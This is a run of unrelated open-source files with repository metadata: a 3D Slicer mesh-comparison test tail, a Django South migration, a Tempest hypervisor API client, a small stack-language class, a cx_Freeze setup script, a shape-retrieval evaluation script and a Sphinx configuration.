output_filenames.append(output_medialmesh_filename)
output_filenames.append(output_procalign_filename)
for i in range(len(output_filenames)):
model2_filepath = os.path.join(ParaToSPHARMMeshOutputDirectoryPath, output_filenames[i])
# Checking the existence of the output files in the folder Step3_ParaToSPHARMMesh
if not os.path.exists(model2_filepath):
return False
# Loading the 2 models for comparison
model1_rootname = output_downloads[i][1].split(".")[0]
model2_rootname = output_filenames[i].split(".")[0]
model1 = MRMLUtility.loadMRMLNode(model1_rootname, ParaToSPHARMMeshOutputDirectoryPath, output_downloads[i][1], 'ModelFile')
model2 = MRMLUtility.loadMRMLNode(model2_rootname, ParaToSPHARMMeshOutputDirectoryPath, output_filenames[i], 'ModelFile')
# Comparison
if not self.polydata_comparison(model1, model2):
return False
return True
def volume_comparison(self, volume1, volume2):
imageData1 = volume1.GetImageData()
imageData2 = volume2.GetImageData()
nbPoints1 = imageData1.GetNumberOfPoints()
nbPoints2 = imageData2.GetNumberOfPoints()
if not nbPoints1 == nbPoints2:
return False
dimension1 = imageData1.GetDimensions()
dimension2 = imageData2.GetDimensions()
if not dimension1 == dimension2:
return False
for i in range(dimension1[0]):
for j in range(dimension1[1]):
for k in range(dimension1[2]):
if not imageData1.GetScalarComponentAsDouble(i,j,k,0) == imageData2.GetScalarComponentAsDouble(i,j,k,0):
return False
return True
def polydata_comparison(self, model1, model2):
polydata1 = model1.GetPolyData()
polydata2 = model2.GetPolyData()
# Number of points
nbPoints1 = polydata1.GetNumberOfPoints()
nbPoints2 = polydata2.GetNumberOfPoints()
if not nbPoints1 == nbPoints2:
return False
# Polydata
data1 = polydata1.GetPoints().GetData()
data2 = polydata2.GetPoints().GetData()
# Number of Components
nbComponents1 = data1.GetNumberOfComponents()
nbComponents2 = data2.GetNumberOfComponents()
if not nbComponents1 == nbComponents2:
return False
# Points value
for i in range(nbPoints1):
for j in range(nbComponents1):
if not data1.GetTuple(i)[j] == data2.GetTuple(i)[j]:
return False
# Area
nbAreas1 = polydata1.GetPointData().GetNumberOfArrays()
nbAreas2 = polydata2.GetPointData().GetNumberOfArrays()
if not nbAreas1 == nbAreas2:
return False
for l in range(nbAreas1):
area1 = polydata1.GetPointData().GetArray(l)
area2 = polydata2.GetPointData().GetArray(l)
# Name of the area
nameArea1 = area1.GetName()
nameArea2 = area2.GetName()
if not nameArea1 == nameArea2:
return False
# Number of Components of the area
nbComponents1 = area1.GetNumberOfComponents()
nbComponents2 = area2.GetNumberOfComponents()
if not nbComponents1 == nbComponents2:
return False
# Points value in the area
for i in range(nbPoints1):
for j in range(nbComponents1):
if not data1.GetTuple(i)[j] == data2.GetTuple(i)[j]:
return False
return True
def download_files(self, directoryPath, downloads):
self.delayDisplay('Starting download')
for url, name in downloads:
filePath = os.path.join(directoryPath, name)
if not os.path.exists(filePath) or os.stat(filePath).st_size == 0:
print('Requesting download %s from %s...\n' % (name, url))
if sys.version_info[0] == 3:
urllib.request.urlretrieve(url, filePath)
else:
urllib.urlretrieve(url, filePath) # python 2.x
self.delayDisplay('Finished with download')
# Function to delete all the data needed for the tests
def cleanSlicerTemporaryDirectory(self):
# deletion of the SAM input folder
inputDirectoryPath = slicer.app.temporaryPath + '/InputShapeAnalysisModule'
if os.path.exists(inputDirectoryPath):
shutil.rmtree(inputDirectoryPath)
# deletion of the SAM output folder
outputDirectoryPath = slicer.app.temporaryPath + '/OutputShapeAnalysisModule'
if os.path.exists(outputDirectoryPath):
shutil.rmtree(outputDirectoryPath)
# deletion of the SAM template folder
templateDirectoryPath = slicer.app.temporaryPath + '/TemplateShapeAnalysisModule'
if os.path.exists(templateDirectoryPath):
shutil.rmtree(templateDirectoryPath)
| {
"content_hash": "d131beb680a1ece312782b6da85150fa",
"timestamp": "",
"source": "github",
"line_count": 2034,
"max_line_length": 255,
"avg_line_length": 44.441986234021634,
"alnum_prop": 0.7200951380054207,
"repo_name": "NIRALUser/SPHARM-PDM",
"id": "f7b1242ded8bb0e6747b1fa48415b74b0302423e",
"size": "90395",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Modules/Scripted/ShapeAnalysisModule/ShapeAnalysisModule.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "54439"
},
{
"name": "C++",
"bytes": "1071539"
},
{
"name": "CMake",
"bytes": "120623"
},
{
"name": "Python",
"bytes": "112150"
}
],
"symlink_target": ""
} |
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'MarketPlaceSettings.twitter_maxlength'
db.alter_column('market_marketplacesettings', 'twitter_maxlength', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True))
def backwards(self, orm):
# Changing field 'MarketPlaceSettings.twitter_maxlength'
db.alter_column('market_marketplacesettings', 'twitter_maxlength', self.gf('django.db.models.fields.IntegerField')())
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'market.contactforminfo': {
'Meta': {'object_name': 'ContactFormInfo'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '64', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"})
},
'market.marketblogpost': {
'Meta': {'object_name': 'MarketBlogPost'},
'allow_comments': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'body': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'post_to_twitter': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'posted_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'posted_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '80', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'market.marketcategory': {
'Meta': {'object_name': 'MarketCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('core.thumbs.ImageWithThumbsField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '60', 'db_index': 'True'})
},
'market.marketmailinglistmember': {
'Meta': {'object_name': 'MarketMailingListMember'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"})
},
'market.marketplace': {
'Meta': {'object_name': 'MarketPlace'},
'base_domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'charge_on_card_as': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'contact_email': ('django.db.models.fields.EmailField', [], {'default': "'[email protected]'", 'max_length': '75'}),
'contact_phone': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '92'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'template_prefix': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '92'})
},
'market.marketplacesettings': {
'Meta': {'object_name': 'MarketPlaceSettings'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['market.MarketPlace']", 'unique': 'True'}),
'twitter_access_token': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'twitter_access_token_secret': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'twitter_consumer_key': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'twitter_consumer_secret': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'twitter_maxlength': ('django.db.models.fields.IntegerField', [], {'default': '140', 'null': 'True', 'blank': 'True'})
},
'market.marketpostcategory': {
'Meta': {'object_name': 'MarketPostCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '80', 'db_index': 'True'}),
'tag': ('django.db.models.fields.CharField', [], {'max_length': '80'})
},
'market.marketpostcomment': {
'Meta': {'object_name': 'MarketPostComment'},
'comment': ('django.db.models.fields.TextField', [], {}),
'commented_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'post': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketBlogPost']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'market.marketpostpick': {
'Meta': {'object_name': 'MarketPostPick'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
'post': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketBlogPost']"})
},
'market.marketsubcategory': {
'Meta': {'unique_together': "(('parent', 'slug'),)", 'object_name': 'MarketSubCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('core.thumbs.ImageWithThumbsField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'subcategories'", 'null': 'True', 'to': "orm['market.MarketCategory']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '60', 'db_index': 'True'})
},
'market.privacypolicy': {
'Meta': {'object_name': 'PrivacyPolicy'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'text': ('django.db.models.fields.TextField', [], {'default': "''"})
},
'market.termsandconditions': {
'Meta': {'object_name': 'TermsAndConditions'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'text': ('django.db.models.fields.TextField', [], {'default': "''"})
}
}
complete_apps = ['market']
| {
"content_hash": "7da66e7c43b8acb4bc461c88b535c4d2",
"timestamp": "",
"source": "github",
"line_count": 160,
"max_line_length": 181,
"avg_line_length": 74.01875,
"alnum_prop": 0.552478257198345,
"repo_name": "codepython/CollectorCity-Market-Place",
"id": "7ac549736b06cad6e1e616a616859396016891d6",
"size": "11861",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "marketplaces/apps/market/migrations/0017_auto__chg_field_marketplacesettings_twitter_maxlength.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "863646"
},
{
"name": "HTML",
"bytes": "475154"
},
{
"name": "JavaScript",
"bytes": "693720"
},
{
"name": "Python",
"bytes": "1860719"
},
{
"name": "Shell",
"bytes": "1174"
}
],
"symlink_target": ""
} |
import untappd
class Venue(object):
    def __init__(self):
        pass
| {
"content_hash": "4c5abc307f8aea102dd409e36efef7f0",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 23,
"avg_line_length": 10.333333333333334,
"alnum_prop": 0.6451612903225806,
"repo_name": "adamomfg/pytappd",
"id": "2aba6afd94fb80de5415c4147e5b80be7c8ca8d9",
"size": "62",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "untappd/venue.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8177"
}
],
"symlink_target": ""
} |
import json
from tempest.common.rest_client import RestClient
class HypervisorClientJSON(RestClient):
def __init__(self, config, username, password, auth_url, tenant_name=None):
super(HypervisorClientJSON, self).__init__(config, username,
password, auth_url,
tenant_name)
self.service = self.config.compute.catalog_type
def get_hypervisor_list(self):
"""List hypervisors information."""
resp, body = self.get('os-hypervisors')
body = json.loads(body)
return resp, body['hypervisors']
def get_hypervisor_list_details(self):
"""Show detailed hypervisors information."""
resp, body = self.get('os-hypervisors/detail')
body = json.loads(body)
return resp, body['hypervisors']
def get_hypervisor_show_details(self, hyper_id):
"""Display the details of the specified hypervisor."""
resp, body = self.get('os-hypervisors/%s' % hyper_id)
body = json.loads(body)
return resp, body['hypervisor']
def get_hypervisor_servers(self, hyper_name):
"""List instances belonging to the specified hypervisor."""
resp, body = self.get('os-hypervisors/%s/servers' % hyper_name)
body = json.loads(body)
return resp, body['hypervisors']
def get_hypervisor_stats(self):
"""Get hypervisor statistics over all compute nodes."""
resp, body = self.get('os-hypervisors/statistics')
body = json.loads(body)
return resp, body['hypervisor_statistics']
def get_hypervisor_uptime(self, hyper_id):
"""Display the uptime of the specified hypervisor."""
resp, body = self.get('os-hypervisors/%s/uptime' % hyper_id)
body = json.loads(body)
return resp, body['hypervisor']
def search_hypervisor(self, hyper_name):
"""Search specified hypervisor."""
resp, body = self.get('os-hypervisors/%s/search' % hyper_name)
body = json.loads(body)
return resp, body['hypervisors']
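    # Minimal usage sketch (illustrative only; the config object and the
    # credentials below are hypothetical, not taken from this module):
    # client = HypervisorClientJSON(config, 'admin', 'secret',
    #                               'http://keystone:5000/v2.0', 'demo')
    # resp, hypervisors = client.get_hypervisor_list()
    # resp, stats = client.get_hypervisor_stats()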
| {
"content_hash": "81091d18df572cdda7910c9748054629",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 79,
"avg_line_length": 39.148148148148145,
"alnum_prop": 0.6121097445600757,
"repo_name": "BeenzSyed/tempest",
"id": "c8ac9518a1d9f02bde959ddc340b11c05379a9b3",
"size": "2746",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tempest/services/compute/json/hypervisor_client.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2613370"
},
{
"name": "Shell",
"bytes": "8687"
}
],
"symlink_target": ""
} |
def Enum(**enums): return type('Enum', (), enums)
class Stack(list):
# all Ostrich types; also used for state management
TYPES = Enum(NUMBER=0, STRING=1, BLOCK=2, ARRAY=3)
# extra states (used for :, etc.)
XSTATE = Enum(ASSIGN='_XASGN', EXIT='_XEXIT', CHAR='_XCHAR',
CHARBLOCK = '_XCHBK')
def typeof(x):
xt = type(x)
if xt is list:
return OST.ARRAY
if xt is block:
return OST.BLOCK
if xt is str:
return OST.STRING
if xt is int or xt is float:
return OST.NUMBER
def convert(x, to_type):
from_type = OS.typeof(x)
if to_type == OST.ARRAY:
if from_type == OST.ARRAY:
return x
return [x]
if to_type == OST.BLOCK:
return block(OS.tostr(x))
if to_type == OST.STRING:
if from_type == OST.ARRAY:
return ' '.join(map(lambda item: OS.convert(item, to_type), x))
if from_type in [OST.NUMBER, OST.STRING, OST.BLOCK]:
return str(x)
if to_type == OST.NUMBER:
return int(OS.tostr(x))
# for convenience
def tostr(x):
return OS.convert(x, OST.STRING)
def inspect(x):
xt = OS.typeof(x)
if xt == OST.ARRAY:
return '[%s]' % ' '.join(map(OS.inspect, x))
if xt == OST.BLOCK:
return '{%s}' % x
if xt == OST.STRING:
return '`%s`' % x
if xt == OST.NUMBER:
return ('%d' if type(x) is int else '%f') % x
# pop n elements
def popn(self, n):
xs = self[-n:]
del self[-n:]
return xs
# pop by precedence: take last n elements, order as specified in TYPES
def pprec(self, n):
return OS.byprec(self.popn(n))
# this one just sorts by precedence
def byprec(xs):
return sorted(xs, key=lambda x: OS.typeof(x), reverse=True)
# used for REPL
def clear(self):
del self[:]
# to differentiate blocks and strings
class Block(str): pass
# just for convenience
OS = Stack
OST = Stack.TYPES
block = Block
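# Usage sketch (illustrative; assumes Python 3, where the plain-function
# class attributes above can be called without an instance):
# s = OS([1, 'two', block('3 4+')])
# OS.typeof(s[2]) == OST.BLOCK   # True
# OS.tostr([1, 2])               # '1 2'
# OS.inspect(block('1 2+'))      # '{1 2+}'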
| {
"content_hash": "58f3172eff395c605126064e4cb7fb0e",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 79,
"avg_line_length": 27.075949367088608,
"alnum_prop": 0.5278167367928939,
"repo_name": "KeyboardFire/ostrich-lang",
"id": "4c2af14f2414d7ee098ad590b55371954a7b6378",
"size": "2157",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/ost_stack.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "38576"
}
],
"symlink_target": ""
} |
import numpy as np
import math
import argparse
import subprocess
import tempfile
from scipy.spatial.distance import *
import os
BASEDIR = os.path.dirname(os.path.abspath(__file__))
EXACTMATCH_DATASET = os.path.join(BASEDIR, 'ExactMatchChairsDataset')
RESULTDIR = os.path.join(BASEDIR,'results')
parser = argparse.ArgumentParser(description="shape2image and image2shape evaluation on exact-match-chair dataset.")
parser.add_argument('-m', '--img_model_ids_file', help='File, each line is model id (0to6776) of img.', required=True)
parser.add_argument('-i', '--input_npy_file', help='Input numpy file (pool5 feature), contains an array of N*C*H*W', required=True)
parser.add_argument('-s', '--shape_embedding_file', help='Shape embedding txt file (#model * #embedding-dim).', required=False)
parser.add_argument('-d', '--model_deploy_file', help='Caffe model deploy file (batch size = 50).', required=False)
parser.add_argument('-p', '--model_param_file', help='Caffe model parameter file.', required=False)
parser.add_argument('-n1', '--nb_image2shape', help='Number of nearest shapes', required=True)
parser.add_argument('-n2', '--nb_shape2image', help='Number of nearest images', required=True)
parser.add_argument('--result_id', help='Result ID (string)', required=True)
parser.add_argument('--distance_matrix_txt_file', help='Distance matrix (#image * #model) txt file (default=None)', default=None, required=False)
parser.add_argument('--clutter_only', help='Test on clutter image only.', action='store_true')
parser.add_argument('--clean_only', help='Test on clean image only.', action='store_true')
parser.add_argument('--feat_dim', help='Embedding feat dim (default=100)', default=100, required=False)
args = parser.parse_args()
# 315 test image names
img_names = [x.rstrip() for x in open(os.path.join(EXACTMATCH_DATASET, 'exact_match_chairs_img_filelist.txt'),'r')]
# 105 modelIds of exact match dataset
exact_match_modelIds = [int(x.rstrip()) for x in open(os.path.join(EXACTMATCH_DATASET, 'exact_match_chairs_shape_modelIds_0to6776.txt'),'r')]
# 141 cluttered image index (in 315 test images)
exact_match_cluttered_indicies = [int(x.rstrip()) for x in open(os.path.join(EXACTMATCH_DATASET, 'exact_match_chairs_cluttered_img_indicies_0to314.txt'),'r')]
exact_match_clean_indicies = [x for x in range(315) if x not in exact_match_cluttered_indicies]
# 315 image model ids
image_model_ids = np.loadtxt(args.img_model_ids_file)
if args.clutter_only:
image_model_ids = image_model_ids[exact_match_cluttered_indicies]
img_names = [img_names[k] for k in exact_match_cluttered_indicies]
elif args.clean_only:
image_model_ids = image_model_ids[exact_match_clean_indicies]
img_names = [img_names[k] for k in exact_match_clean_indicies]
print 'image_model_ids:', image_model_ids
image_ids_for_315_models = []
for modelid in exact_match_modelIds:
t = []
for i in range(len(image_model_ids)):
if modelid == image_model_ids[i]:
t.append(i)
image_ids_for_315_models.append(t)
#
# COMPUTE IMAGE-SHAPE DISTANCE MATRIX
#
# configuration params
if args.distance_matrix_txt_file is not None:
D = np.loadtxt(args.distance_matrix_txt_file)
if D.shape[0] > len(image_model_ids):
assert(D.shape[0] == 315)
if args.clutter_only:
D = D[exact_match_cluttered_indicies,:] # 141*6777
elif args.clean_only:
D = D[exact_match_clean_indicies,:]
else:
deploy_file = args.model_deploy_file
shape_embedding_file = args.shape_embedding_file
embedding_model_path = args.model_param_file
# get image embedding from pool5 features
feat_name = os.path.join(RESULTDIR, 'tmp_image_embedding')
    cmd = os.path.join(BASEDIR, 'extract_feature_batch_generic.py')  # no leading slash, so the join keeps BASEDIR
subprocess.call(['python', cmd, '-i', args.input_npy_file, '-d', deploy_file, '-p', embedding_model_path, '-b', str(50), '--feat_dim', str(args.feat_dim), '--feat_name', 'fc8_embedding', '--save_file', feat_name, '--save_file_format', 'npy'])
# compute distances between images and shapes
image_embedding = np.load(feat_name+'.npy')
if args.clutter_only:
image_embedding = image_embedding[exact_match_cluttered_indicies,:]
elif args.clean_only:
image_embedding = image_embedding[exact_match_clean_indicies,:]
image_embedding = image_embedding.reshape((image_embedding.shape[0], image_embedding.shape[1]))
assert(image_model_ids.shape[0] == image_embedding.shape[0])
shape_embedding = np.loadtxt(shape_embedding_file)
print image_embedding.shape, shape_embedding.shape
D = cdist(image_embedding, shape_embedding)
#
# IMAGE2SHAPE
#
dist_name = os.path.join(RESULTDIR, 'tmp_image2shape_dist.txt')
np.savetxt(dist_name, D)
print np.shape(D)
image_N = D.shape[0]
image2shape_retrieval_ranking = []
image2shape_retrieval_ranking_105models = []
for k in range(image_N):
distances = D[k,:]#[float(distance) for distance in line.strip().split()]
ranking = range(len(distances))
ranking.sort(key = lambda rank:distances[rank])
print 'image %d %s \t retrieval: %d' % (k,img_names[k].split('/')[-1], ranking.index(image_model_ids[k])+1)
image2shape_retrieval_ranking.append(ranking.index(image_model_ids[k])+1)
# only consider the 105 models
distances_105models = D[k,exact_match_modelIds]
ranking_105models = range(len(distances_105models))
ranking_105models.sort(key = lambda rank:distances_105models[rank])
image2shape_retrieval_ranking_105models.append(ranking_105models.index(exact_match_modelIds.index(image_model_ids[k]))+1)
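# Top-K accuracy below = fraction of query images whose ground-truth shape
# ranks within the first K retrievals. Hypothetical illustration: if 70 of
# 141 cluttered queries rank their true model at position <= 10, top-10
# accuracy is 70 / 141 ~= 0.496.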
image2shape_topK_accuracies = []
image2shape_topK_accuracies_105models = []
for topK in range(250):
n = sum([r <= topK+1 for r in image2shape_retrieval_ranking])
image2shape_topK_accuracies.append(n / float(image_N))
# only consider the 105 models
n = sum([r <= topK+1 for r in image2shape_retrieval_ranking_105models])
image2shape_topK_accuracies_105models.append(n / float(image_N))
np.savetxt(args.result_id+'_image2shape_topK_accuracy.txt', image2shape_topK_accuracies, fmt='%.4f')
np.savetxt(args.result_id+'_image2shape_topK_accuracy_105models.txt', image2shape_topK_accuracies_105models, fmt='%.4f')
#
# SHAPE2IMAGE
#
dist_name = os.path.join(RESULTDIR, 'tmp_shape2image_dist.txt')
np.savetxt(dist_name, D.transpose())
image_model_ids_set = set(image_model_ids)
model_N = min(len(exact_match_modelIds), len(set(image_model_ids)))
first_ranks = []
last_ranks = []
shape2image_retrieval_ranking = []
for k in range(len(exact_match_modelIds)): # 0 - 104
modelId = exact_match_modelIds[k]
if modelId not in image_model_ids_set:
continue
distances = D.transpose()[modelId,:] # clutter: 141*1
ranking = range(len(distances))
ranking.sort(key = lambda rank:distances[rank])
ranks = [ranking.index(j)+1 for j in image_ids_for_315_models[k]]
retrieval_rank = min(ranks) # find images corresponding to this model
print 'model %d %s\t retrieval: %d' % (k,exact_match_modelIds[k], retrieval_rank)
shape2image_retrieval_ranking.append(retrieval_rank)
first_ranks.append(min(ranks))
last_ranks.append(max(ranks))
shape2image_topK_accuracies = []
for topK in range(250):
n = sum([r <= topK+1 for r in shape2image_retrieval_ranking])
shape2image_topK_accuracies.append(n / float(model_N))
print first_ranks
print last_ranks
np.savetxt(args.result_id+'_shape2image_topK_accuracy.txt', shape2image_topK_accuracies, fmt='%.4f')
np.savetxt(args.result_id+'_first_last_appearance_median_rank.txt', [np.median(first_ranks), np.median(last_ranks)], fmt='%d')
| {
"content_hash": "90fe9b641efb744d86c624066aeb6dcd",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 244,
"avg_line_length": 45.04819277108434,
"alnum_prop": 0.7250601765177855,
"repo_name": "ShapeNet/JointEmbedding",
"id": "6db87f19847935354a5a49f6135911b46e547a40",
"size": "7478",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/experiments/shape2image_image2shape_evaluation.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "1929"
},
{
"name": "M",
"bytes": "388"
},
{
"name": "Matlab",
"bytes": "33139"
},
{
"name": "Python",
"bytes": "139434"
},
{
"name": "Shell",
"bytes": "17152"
}
],
"symlink_target": ""
} |
import cx_Freeze
import sys
base = None
if sys.platform == 'win32':
base = "Win32GUI"
executables = [cx_Freeze.Executable("weather.py", base=base, icon="sun.ico")]
cx_Freeze.setup(
name="Sunshine",
options={"build_exe": {"packages": ["Tkinter", "PIL"], "include_files": ["keys.py", "sun.ico", "sun.png",
"next.png", "prev.png",
"city.list.json"]}},
version="0.01",
description="Simple weather GUI application",
executables=executables
)
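# Typical invocation for this script (standard cx_Freeze workflow, assumed
# rather than stated in the original): python setup.py build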
| {
"content_hash": "efa8c6858b4d1c55de974ec5e45245ca",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 109,
"avg_line_length": 32.578947368421055,
"alnum_prop": 0.4862681744749596,
"repo_name": "DevipriyaSarkar/Sunshine",
"id": "5bd13a36b075b17e1a76238e61977140ad53dde4",
"size": "619",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "13572"
}
],
"symlink_target": ""
} |
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.todo']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Dolphin'
copyright = u'2012, Jeremy Self'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
